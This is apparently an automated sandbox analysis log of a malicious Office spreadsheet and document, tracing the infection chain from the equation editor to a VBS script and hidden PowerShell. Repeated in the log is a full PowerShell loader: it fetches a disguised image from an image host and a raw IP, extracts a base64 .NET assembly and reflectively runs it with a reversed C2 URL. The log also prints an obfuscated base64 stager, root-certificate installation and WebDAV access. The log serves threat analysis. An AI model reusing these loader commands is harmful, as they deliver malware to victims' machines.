Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/738/994/original/new_image_vbs_updated.jpg?1707769907', 'http://45.74.19.84/xampp/bkp/vbs_novo_new_image.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.HGUS/6653/69.442.29.19//:ptth' , '1' , 'C:\ProgramData\' , 'SUU','RegAsm',''))} }
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\loverhappy.vbs" Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDgDgTreLwDgTre5DgTreDkDgTreNDgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreXwB1DgTreHDgTreDgTreZDgTreBhDgTreHQDgTreZQBkDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMDgTreDgTre3DgTreDcDgTreNgDgTre5DgTreDkDgTreMDgTreDgTre3DgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreDgTre6DgTreC8DgTreLwDgTre0DgTreDUDgTreLgDgTre3DgTreDQDgTreLgDgTrexDgTreDkDgTreLgDgTre4DgTreDQDgTreLwB4DgTreGEDgTrebQBwDgTreHDgTreDgTreLwBiDgTreGsDgTrecDgTreDgTrevDgTreHYDgTreYgBzDgTreF8DgTrebgBvDgTreHYDgTrebwBfDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTreJwDgTrepDgJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/738/994/original/new_image_vbs_updated.jpg?1707769907', 'http://45.74.19.84/xampp/bkp/vbs_novo_new_image.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.HGUS/6653/69.442.29.19//:ptth' , '1' , 'C:\ProgramData\' , 'SUU','RegAsm',''))} }Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: Binary string: mscorlib.pdb source: powershell.exe, 0000000F.00000002.433742680.0000000004D93000.00000004.00000020.00020000.00000000.sdmp
Source: ~DF339C70062F0AA3F9.TMP.0.drInitial sample: OLE indicators vbamacros = False
Source: SHREE GANESH BOOK SERVICES-347274.xlsInitial sample: OLE indicators encrypted = True

Data Obfuscation

barindex
Suspicious powershell command line found
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDgDgTreLwDgTre5DgTreDkDgTreNDgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreXwB1DgTreHDgTreDgTreZDgTreBhDgTreHQDgTreZQBkDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMDgTreDgTre3DgTreDcDgTreNgDgTre5DgTreDkDgTreMDgTreDgTre3DgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreDgTre6DgTreC8DgTreLwDgTre0DgTreDUDgTreLgDgTre3DgTreDQDgTreLgDgTrexDgTreDkDgTreLgDgTre4DgTreDQDgTreLwB4DgTreGEDgTrebQBwDgTreHDgTreDgTreLwBiDgTreGsDgTrecDgTreDgTrevDgTreHYDgTreYgBzDgTreF8DgTrebgBvDgTreHYDgTrebwBfDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTreJwDgTrepDg
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/738/994/original/new_image_vbs_updated.jpg?1707769907', 'http://45.74.19.84/xampp/bkp/vbs_novo_new_image.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.HGUS/6653/69.442.29.19//:ptth' , '1' , 'C:\ProgramData\' , 'SUU','RegAsm',''))} }
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDgDgTreLwDgTre5DgTreDkDgTreNDgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreXwB1DgTreHDgTreDgTreZDgTreBhDgTreHQDgTreZQBkDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMDgTreDgTre3DgTreDcDgTreNgDgTre5DgTreDkDgTreMDgTreDgTre3DgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreDgTre6DgTreC8DgTreLwDgTre0DgTreDUDgTreLgDgTre3DgTreDQDgTreLgDgTrexDgTreDkDgTreLgDgTre4DgTreDQDgTreLwB4DgTreGEDgTrebQBwDgTreHDgTreDgTreLwBiDgTreGsDgTrecDgTreDgTrevDgTreHYDgTreYgBzDgTreF8DgTrebgBvDgTreHYDgTrebwBfDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTreJwDgTrepDgJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/738/994/original/new_image_vbs_updated.jpg?1707769907', 'http://45.74.19.84/xampp/bkp/vbs_novo_new_image.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.HGUS/6653/69.442.29.19//:ptth' , '1' , 'C:\ProgramData\' , 'SUU','RegAsm',''))} }Jump to behavior

Persistence and Installation Behavior

barindex
Microsoft Office launches external ms-search protocol handler (WebDAV)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\91.92.244.96\DavWWWRootJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\91.92.244.96\DavWWWRootJump to behavior
Installs new ROOT certificates
Source: C:\Windows\SysWOW64\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
Office viewer loads remote template
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXESection loaded: netapi32.dll and davhlpr.dll loadedJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_036B0511 URLDownloadToFileW,ShellExecuteW,ExitProcess,9_2_036B0511
Source: C:\Windows\SysWOW64\wscript.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
